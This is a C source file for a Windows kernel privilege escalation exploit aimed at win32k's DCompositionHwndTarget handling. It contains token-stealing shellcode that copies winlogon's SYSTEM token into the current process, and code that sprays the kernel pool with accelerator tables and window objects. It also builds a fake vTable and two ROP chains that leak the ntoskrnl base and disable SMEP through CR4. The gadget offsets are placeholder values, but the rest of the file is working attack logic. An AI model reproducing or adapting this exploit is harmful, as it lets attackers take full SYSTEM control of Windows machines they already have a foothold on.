#include <Windows.h>
#include "Exploiter.h"

// Fixed user-mode addresses of the regions this file allocates with
// VirtualAlloc (see ExploiterInit and ExploiterDoFengShui).
static const int AccelArrayBase = 0x43000000; // backing store for pAccels
static const int HwndArrayBase = 0x44000000;  // backing store for pHwnds
static const int DcomArrayBase = 0x41000000;  // slots passed as the third argument of CreateDCompositionHwndTarget
static const int PayloadBase = 0x42000000;    // receives the copy of sc[]; also holds the slots at +0x100, +0x1950 and +0x5000..
// Deliberately not declared const, so that the compiler stores
// these variables in .data.
// The win32k* values are added to win32kBaseAddr, and ntSetCr4 to ntBaseAddr,
// when the chains are written; ntExAllocatePoolWithTag is subtracted in
// ExploiterGetNtBase.
static ULONGLONG win32kPopRaxRet = 0xdeedbeefdeedbe01;
static ULONGLONG win32kXchgRaxRsp = 0xdeedbeefdeedbe02;
static ULONGLONG win32kExAllocatePoolWithTag = 0xdeedbeefdeedbe03;
static ULONGLONG win32kPopRcxRet = 0xdeedbeefdeedbe04;
static ULONGLONG win32kDefRaxIntoRcx = 0xdeedbeefdeedbe05;
static ULONGLONG win32kWriteRaxIntoRcx = 0xdeedbeefdeedbe06;
static ULONGLONG win32kPopRbxRet = 0xdeedbeefdeedbe07;
static ULONGLONG win32kRet = 0xdeedbeefdeedbe08;
static ULONGLONG win32kMovRaxR11Ret = 0xdeedbeefdeedbe09;
static ULONGLONG win32kAddRaxRcxRet = 0xdeedbeefdeedbe0a;
static ULONGLONG win32kPopEspRet = 0xdeedbeefdeedbe0b;
static ULONGLONG win32kXchgRaxRspAdjust = 0xdeedbeefdeedbe0c;
static ULONGLONG win32kCHwndDelete = 0xdeedbeefdeedbe0d;
static ULONGLONG ntSetCr4 = 0xdeedbeefdeedbe0e;
static ULONGLONG ntExAllocatePoolWithTag = 0xdeedbeefdeedbe0f;

// Signature used for the "CreateDCompositionHwndTarget" export that
// ExploiterInit looks up in USER32.dll with GetProcAddress.
// Callers in this file pass a window handle, 0, and an address inside the
// DcomArrayBase region.
typedef NTSTATUS(__stdcall *FuncCreateDCompositionHwndTarget) (
	_In_   HANDLE hWnd,
	_In_   DWORD dwNum,
	_Out_  ULONGLONG pMem
	);

// Signature used for the "DestroyDCompositionHwndTarget" export that
// ExploiterInit looks up in USER32.dll with GetProcAddress.
typedef NTSTATUS(__stdcall *FuncDestroyDCompositionHwndTarget) (
	_In_   HANDLE hWnd,
	_In_   DWORD dwNum
	);

// Signature of DefWindowProcA; WndProc casts the pointer stored at
// PayloadBase + 0x1950 to this type before calling it.
typedef LRESULT(WINAPI *FuncDefWindowProcA) (
	_In_  HWND hWnd,
	_In_  UINT Msg,
	_In_  WPARAM wParam,
	_In_  LPARAM lParam
	);

static CHAR sc[] = {
	'\x4D', '\x8B', '\xBB', '\x68', '\x01', '\x00', '\x00',                                  // mov r15, [r11+0x168], save return address of kernel stack
	'\x41', '\x51',                                                                          // push r9 save regs
	'\x41', '\x52',                                                                          // push r10
	'\x65', '\x4C', '\x8B', '\x0C', '\x25', '\x88', '\x01', '\x00', '\x00',                  // mov r9, gs:[0x188], get _ETHREAD from KPCR (PRCB @ 0x180 from KPCR, _ETHREAD @ 0x8 from PRCB)
	'\x4D', '\x8B', '\x89', '\xB8', '\x00', '\x00', '\x00',                                  // mov r9, [r9+0xb8], get _EPROCESS from _ETHREAD
	'\x4D', '\x89', '\xCA',                                                                  // mov r10, r9 save current eprocess
	'\x4D', '\x8B', '\x89', '\x40', '\x02', '\x00', '\x00',                                  // mov r9, [r9+0x240] $a, get blink
	'\x49', '\x81', '\xE9', '\x38', '\x02', '\x00', '\x00',                                  // sub r9, 0x238 => _KPROCESS
	'\x41', '\x81', '\xB9', '\x38', '\x04', '\x00', '\x00', '\x77', '\x69', '\x6E', '\x6C',  // cmp [r9+0x438], 0x6c6e6977 does ImageName begin with 'winl' (winlogon)
	'\x75', '\xe5',                                                                          // jnz $a no? then keep searching!
	'\x4D', '\x8B', '\xA1', '\xE0', '\x02', '\x00', '\x00',                                  // mov r12, [r9+0x2e0] get pid
	'\x48', '\xC7', '\xC0', '\x00', '\x10', '\x00', '\x42',                                  // mov rax, 0x42001000
	'\x4C', '\x89', '\x20',                                                                  // mov [rax], r12 save pid for use later
	'\x4D', '\x8B', '\x89', '\x48', '\x03', '\x00', '\x00',                                  // mov r9, [r9+0x348] get token
	'\x49', '\x83', '\xE1', '\xF0',															 // and r9, 0xfffffffffffffff0 get SYSTEM token's address
	'\x49', '\x83', '\x41', '\xD0', '\x0A',													 // add [r9-0x30], 0x10 increment SYSTEM token's reference count by 0x10
	'\x4D', '\x89', '\x8A', '\x48', '\x03', '\x00', '\x00',                                  // mov [r10+0x348], r9 replace our token with system token
	'\x41', '\x5A',                                                                          // pop r10 restore regs
	'\x41', '\x59',                                                                          // pop r9
	'\x41', '\x53',                                                                          // push r11, pointer near to original stack
	'\x5C',                                                                                  // pop rsp
	'\x48', '\x83', '\xec', '\x28',                                                          // sub rsp, 0x28, restore original kernel rsp
	'\xFF', '\x24', '\x25', '\x70', '\x50', '\x00', '\x42',                                  // jmp [0x42005070], continue on to delete the object CHwndTargetProp::Delete(void)
	0
};
// Handle arrays; both are assigned in ExploiterDoFengShui
// (pHwnds: 1000 entries at HwndArrayBase, pAccels: 5000 entries at AccelArrayBase).
static HWND *pHwnds = NULL;
static HACCEL *pAccels = NULL;
// Function pointers resolved from USER32.dll in ExploiterInit.
static FuncCreateDCompositionHwndTarget MyCreateDCompositionHwndTarget = NULL;
static FuncDestroyDCompositionHwndTarget MyDestroyDCompositionHwndTarget = NULL;


// WndProc is the window procedure registered for every window class created
// in ExploiterDoFengShui. It does nothing of consequence: each message is
// forwarded unchanged to DefWindowProcA. The windows exist only because
// `CreateDCompositionHwndTarget` requires a window handle.
//
// The address of DefWindowProcA is not referenced directly; it is read from
// the slot at PayloadBase + 0x1950, which ExploiterInit fills in.
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
	FuncDefWindowProcA MyDefWindowProcA;
	ULONGLONG          pMyDefWindowProcA;

	// Load the stored pointer and forward the message.
	pMyDefWindowProcA = *(ULONGLONG *)(PayloadBase + 0x1950);
	MyDefWindowProcA = (FuncDefWindowProcA)pMyDefWindowProcA;
	return MyDefWindowProcA(hwnd, msg, wParam, lParam);
}

// One-time setup: resolves the two DComposition entry points from USER32.dll,
// allocates the DcomArrayBase (0x2000 bytes, read/write) and PayloadBase
// (0x10000 bytes, read/write/execute) regions, copies sc[] to the start of
// PayloadBase, and stores the address of DefWindowProcA at PayloadBase + 0x1950.
VOID ExploiterInit() {
	LoadLibrary("USER32.dll");
	HMODULE user32 = GetModuleHandle("USER32.dll");
	MyCreateDCompositionHwndTarget = (FuncCreateDCompositionHwndTarget)GetProcAddress(user32, "CreateDCompositionHwndTarget");
	MyDestroyDCompositionHwndTarget = (FuncDestroyDCompositionHwndTarget)GetProcAddress(user32, "DestroyDCompositionHwndTarget");
	// Allocate memory regions that we use to store various data.
	VirtualAlloc((LPVOID)DcomArrayBase, 0x2000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	VirtualAlloc((LPVOID)PayloadBase, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	SecureZeroMemory((LPVOID)PayloadBase, 0x10000);
	memcpy((LPVOID)PayloadBase, sc, sizeof(sc));

	// Save the function pointer of DefWindowProcA at a fixed slot so that
	// WndProc can load it from there and call it directly, without resolving
	// the import itself.
	// NOTE(review): the original comment said WndProc later runs in kernel mode
	// and cannot resolve the function then; that cannot be confirmed from this file.
	ULONGLONG *pDefWindowProcA = (ULONGLONG *)(PayloadBase + 0x1950);
	*pDefWindowProcA = (ULONGLONG)GetProcAddress(user32, "DefWindowProcA"); // resolved by name from USER32.dll
}

// Arranges the objects used by the rest of the file:
//   1. creates 5000 accelerator tables (handles stored in pAccels),
//   2. registers up to 1000 window classes and creates one window per class
//      (handles stored in pHwnds; the loop stops at the first failed window),
//   3. destroys accelerator tables 3600..4599 in two interleaved passes and,
//      after each pass, creates 500 DCompositionHwndTarget objects,
//   4. destroys the DCompositionHwndTarget objects of windows 400..404.
// Requires ExploiterInit to have run, since it calls the resolved
// MyCreateDCompositionHwndTarget / MyDestroyDCompositionHwndTarget pointers.
VOID ExploiterDoFengShui() {
	HINSTANCE hThisInstance;
	ATOM classAtom;
	WNDCLASSEXA windowClass;
	HWND hWnd;
	HACCEL hAccel;
	LPACCEL lpAccel;
	// Strings needed. The "0000" suffix of winClass / winTitle is overwritten
	// on every iteration using the matching "%04x" format string.
	CHAR winClass[] = { 'w', 'i', 'n', 'c', 'l', 's', '0', '0', '0', '0', 0 };
	CHAR winClassFmt[] = { 'w', 'i', 'n', 'c', 'l', 's', '%', '0', '4', 'x', 0 };
	CHAR winTitle[] = { 'w', 'i', 'n', 't', 'i', 't', '0', '0', '0', '0', 0 };
	CHAR winTitleFmt[] = { 'w', 'i', 'n', 't', 'i', 't', '%', '0', '4', 'x', 0 };

	// Initial setup for pool fengshui: a single zeroed ACCEL entry that is
	// reused as the template for every accelerator table.
	lpAccel = (LPACCEL)malloc(sizeof(ACCEL));
	SecureZeroMemory(lpAccel, sizeof(ACCEL));

	// Create many accelerator tables, and store them.
	pAccels = (HACCEL *)VirtualAlloc((LPVOID)(AccelArrayBase), sizeof(HACCEL)* 5000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	for (INT i = 0; i < 5000; i++) {
		hAccel = CreateAcceleratorTableA(lpAccel, 1);
		pAccels[i] = hAccel;
	}

	// Create window handles, and store them.
	pHwnds = (HWND *)VirtualAlloc((LPVOID)(HwndArrayBase), sizeof(HWND)* 1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	hThisInstance = GetModuleHandleA(NULL);
	for (INT i = 0; i < 1000; i++) {
		SecureZeroMemory(&windowClass, sizeof(WNDCLASSEXA));
		// Give each class and window a distinct name: "wincls%04x" / "wintit%04x".
		wsprintfA(winClass, winClassFmt, i);
		wsprintfA(winTitle, winTitleFmt, i);

		windowClass.cbSize = sizeof(WNDCLASSEXA);
		windowClass.style = CS_HREDRAW | CS_VREDRAW;
		windowClass.lpfnWndProc = (WNDPROC)WndProc;
		windowClass.hInstance = hThisInstance;
		windowClass.hIcon = NULL;
		windowClass.hCursor = NULL;
		windowClass.hbrBackground = (HBRUSH)COLOR_WINDOW;
		windowClass.lpszMenuName = NULL;
		windowClass.lpszClassName = winClass;
		classAtom = RegisterClassExA(&windowClass);
		hWnd = CreateWindowEx(0, MAKEINTATOM(classAtom), winTitle, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, hThisInstance, NULL);

		if (hWnd) {
			pHwnds[i] = hWnd;
		}
		else {
			// Stop at the first window that could not be created; the
			// remaining pHwnds entries are not written by this loop.
			break;
		}
	}

	// Create holes in the series of accelerator tables
	// (even indices 3600, 3602, ..., 4598).
	for (INT i = 3600; i < 4600; i += 2) {
		DestroyAcceleratorTable(pAccels[i]);
	}

	// Fill the holes with DCompositionHwndTarget(s), one per window 0..499.
	// (at this point we have a series of alternating DCompositionHwndTarget objects)
	for (INT i = 0; i < 500; i++) {
		MyCreateDCompositionHwndTarget(pHwnds[i], 0, DcomArrayBase + i * 4);
	}

	// Create "adjacent" holes (to the previous holes) in the series of
	// accelerator tables (odd indices 3601, 3603, ..., 4599).
	for (INT i = 3601; i < 4601; i += 2) {
		DestroyAcceleratorTable(pAccels[i]);
	}

	// Fill the holes with DCompositionHwndTarget(s), one per window 500..999.
	// (at this point we have a contiguous series of DCompositionHwndTarget objects)
	for (INT i = 500; i < 1000; i++) {
		MyCreateDCompositionHwndTarget(pHwnds[i], 0, DcomArrayBase + i * 4);
	}

	// Create some holes in the contiguous series of DCompositionHwndTarget objects,
	// that we insert the vulnerable object into (windows 400..404).
	for (INT i = 400; i < 405; i++) {
		MyDestroyDCompositionHwndTarget(pHwnds[i], 0);
	}
}

// Clean up after the heap fengshui performed earlier (for cleanliness, reliability).
// Calls DestroyAcceleratorTable on all 5000 entries of pAccels; entries
// 3600..4599 were already destroyed in ExploiterDoFengShui and are passed again here.
// The function name is spelled "Expoiter" in this file; it is kept as-is
// because callers are outside this view.
VOID ExpoiterCleanUp() {
	for (INT i = 0; i < 5000; i++) {
		DestroyAcceleratorTable(pAccels[i]);
	}
}

// Set up the stack pivot and adjustment, and ROP chain 1, which retrieves the
// base address of `ntoskrnl`.
//
// win32kBaseAddr: base address that every win32k* offset in this file is added to.
// All writes go to the PayloadBase + 0x5000 .. 0x5110 area.
VOID ExploiterSetupFirstChain(ULONGLONG win32kBaseAddr) {
	// Stack pivot and adjustment.
	//
	// IMPORTANT NOTE.
	// 
	// This vTable is actually accessed twice as part of the code flow. 
	// The first access is to the 2nd method in the vTable, at [RAX+8] (*).
	// The second access is to the 1st method in the vTable, at [RAX] (**).
	//
	// (*) First access
	//
	// As mentioned, in the code flow, there is a CALL [RAX+8], where RAX is the
	// address of the fake vTable (0x42005000). 
	//
	// The call places us at [0x42005000+8], which is the xchg instruction 
	// (stack pivot). At this point after the xchg, RSP is pointing to 0x42005000.
	// The next instruction of the gadget is RET, which will exec. POP RAX.
	// This sequence (RET + POP) shifts RSP by a total of 16 bytes, which is the
	// start of ROP chain 1.
	//
	*(ULONGLONG *)(PayloadBase + 0x5000) = win32kBaseAddr + win32kPopRaxRet;   // pop rax # ret               <-- RAX
	*(ULONGLONG *)(PayloadBase + 0x5008) = win32kBaseAddr + win32kXchgRaxRsp;  // xchg rax, rsp # ret (pivot) <-- this is where (1st) CALL jumps to.
	//
	// --- End stack pivot and adjustment ---

	// ROP chain 1: Retrieve base address of `ntoskrnl`.
	//
	// When ROP chain 1 exits, RBX will hold the address of our 
	// (fake) vTable. And 0x42000100 will hold the (leaked) address of
	// `ntoskrnl!ExAllocatePoolWithTag`.
	//
	*(ULONGLONG *)(PayloadBase + 0x5010) = win32kBaseAddr + win32kPopRaxRet;             // pop rax # ret  (RAX is source for our write)
	*(ULONGLONG *)(PayloadBase + 0x5018) = win32kBaseAddr + win32kExAllocatePoolWithTag; // pop into rax   (pointer to leaked address of `ntoskrnl!ExAllocatePoolWithTag` that win32k imports)
	*(ULONGLONG *)(PayloadBase + 0x5020) = win32kBaseAddr + win32kPopRcxRet;             // pop rcx # ret  (RCX is destination for our write)
	*(ULONGLONG *)(PayloadBase + 0x5028) = PayloadBase + 0x100;                          // pop into rcx   (memory to write leaked address)
	*(ULONGLONG *)(PayloadBase + 0x5030) = win32kBaseAddr + win32kDefRaxIntoRcx;         // mov rax, [rax] # mov [rcx], rax # ret (write gadget to [RCX])

	// (**) Second access
	//
	// The second time the vTable is accessed (described above), it will
	// try to execute `POP RAX # RET`, which is undesirable. Hence, as part of
	// the *first* ROP chain, we override the vTable again, so that the second
	// access to it will be okay.
	//
	// When the code flow resumes after ROP chain 1 ends, the code will
	// use *RBX for its second access to the vTable. Hence, we want to 
	// place our own value into RBX. Therefore, we `POP RBX`, which places
	// 0x42005100 into RBX. 0x42005100 is yet another (unused) memory
	// region that we control. We will construct a new fake vTable at 0x42005100.
	//
	*(ULONGLONG *)(PayloadBase + 0x5038) = win32kBaseAddr + win32kPopRbxRet;    // pop rbx # ret
	*(ULONGLONG *)(PayloadBase + 0x5040) = PayloadBase + 0x5100;        // this will clobber the existing vTable object pointer (RBX) -------------------------------
	//                                                                                                                                                               |
	// Setup the new fake vTable at 0x42005100. We don't do anything interesting                                                                                     |
	// with the second call. We just want it to return nicely.                                                                                                       |
	*(ULONGLONG *)(PayloadBase + 0x5100) = PayloadBase + 0x5110;        // double-dereference to get to gadget                                     (actual ROP chain |
	*(ULONGLONG *)(PayloadBase + 0x5108) = PayloadBase + 0x5110;        // (arbitrary pointer to pointer)                                            continues here) |
	*(ULONGLONG *)(PayloadBase + 0x5110) = win32kBaseAddr + win32kRet;  // (`RET` gadget)                                                                            |
	//                                                                                                                                                               |
	// Resume execution. Restore original stack pointer.                                                                                                             |
	*(ULONGLONG *)(PayloadBase + 0x5048) = win32kBaseAddr + win32kMovRaxR11Ret;    // mov rax, r11 # ret (register holding a value close to original stack pointer) <-
	*(ULONGLONG *)(PayloadBase + 0x5050) = win32kBaseAddr + win32kPopRcxRet;       // pop rcx # ret
	*(ULONGLONG *)(PayloadBase + 0x5058) = 0x8;                                    // pop into rcx
	*(ULONGLONG *)(PayloadBase + 0x5060) = win32kBaseAddr + win32kAddRaxRcxRet;    // add rax, rcx # ret (adjust the stack pointer)
	*(ULONGLONG *)(PayloadBase + 0x5068) = win32kBaseAddr + win32kPopRcxRet;       // pop rcx # ret
	*(ULONGLONG *)(PayloadBase + 0x5070) = PayloadBase + 0x5088;                   // pop into rcx
	*(ULONGLONG *)(PayloadBase + 0x5078) = win32kBaseAddr + win32kWriteRaxIntoRcx; // mov [rcx], rax # ret (write gadget to [RCX])--
	*(ULONGLONG *)(PayloadBase + 0x5080) = win32kBaseAddr + win32kPopEspRet;                // pop rsp # ret                                 |
	//*(ULONGLONG *)(PayloadBase + 0x5088) <----------------------------------------------------------------------------------------
}

// Set up ROP chain 2: disable SMEP and return to the token stealing shellcode.
// This overwrites the values in our fake vTable (0x42005000), previously
// written by ExploiterSetupFirstChain, with a new ROP chain. It gets called
// later in the second trigger.
//
// win32kBaseAddr: base address that the win32k* offsets are added to.
// ntBaseAddr:     base address that ntSetCr4 is added to.
VOID ExploiterSetupSecondChain(ULONGLONG win32kBaseAddr, ULONGLONG ntBaseAddr) {
	*(ULONGLONG *)(PayloadBase + 0x5000) = win32kBaseAddr + win32kXchgRaxRspAdjust; // xchg eax, esp # sbb al, 0 # mov eax, ebx # add rsp, 0x20 # pop rbx # ret
	*(ULONGLONG *)(PayloadBase + 0x5008) = win32kBaseAddr + win32kRet;		        // filler
	*(ULONGLONG *)(PayloadBase + 0x5010) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5018) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5020) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5028) = win32kBaseAddr + win32kPopRaxRet;        // pop rax # ret
	*(ULONGLONG *)(PayloadBase + 0x5030) = 0x406f8;                                 // pop into rax, cr4 value 
	*(ULONGLONG *)(PayloadBase + 0x5038) = ntBaseAddr + ntSetCr4;                   // mov cr4, rax # add rsp, 0x28 # ret  (SMEP disabling gadget)
	*(ULONGLONG *)(PayloadBase + 0x5040) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5048) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5050) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5058) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5060) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5068) = PayloadBase;                             // return to userland and win!
	*(ULONGLONG *)(PayloadBase + 0x5070) = win32kBaseAddr + win32kCHwndDelete;      // CHwndTargetProp::Delete(void)
}

// First trigger (ROP chain 1)
//
// When `DestroyDCompositionHwndTarget` is called, it will destroy the object
// by calling its destructor, which will make use of the overwritten vTable
// pointer. This, we abuse, to call ROP chain 1. ROP chain 1 leaks the address
// of `ntoskrnl!ExAllocatePoolWithTag`.
//
// The call is issued for every one of the 1000 entries in pHwnds.
VOID ExploiterRunFirstChain() {
	for (INT i = 0; i < 1000; i++) {
		MyDestroyDCompositionHwndTarget(pHwnds[i], 0);
	}
}

// Second trigger (ROP chain 2)
//
// When `DestroyWindow` is called, it will attempt to find any dangling
// references to the window. Because the "first trigger" did not properly
// destroy the `DCompositionHwndTarget` object (which has a reference to 
// the window), `DestroyWindow` will try, again, to call the destructor
// for the `DCompositionHwndTarget` object. Hence, the same destructor is
// called. But because we have already re-setup the vTable, it calls
// ROP chain 2.
//
// DestroyWindow is called on every one of the 1000 entries in pHwnds.
VOID ExploiterRunSecondChain() {
	for (INT i = 0; i < 1000; i++) {
		DestroyWindow(pHwnds[i]);
	}
}

// Compute the base address of `ntoskrnl` from `ntoskrnl!ExAllocatePoolWithTag`.
// Reads the 64-bit value stored at PayloadBase + 0x100 (the destination that
// ExploiterSetupFirstChain configures for its write) and subtracts the
// ntExAllocatePoolWithTag offset from it.
ULONGLONG ExploiterGetNtBase() {
	return *(ULONGLONG *)(PayloadBase + 0x100) - ntExAllocatePoolWithTag;
}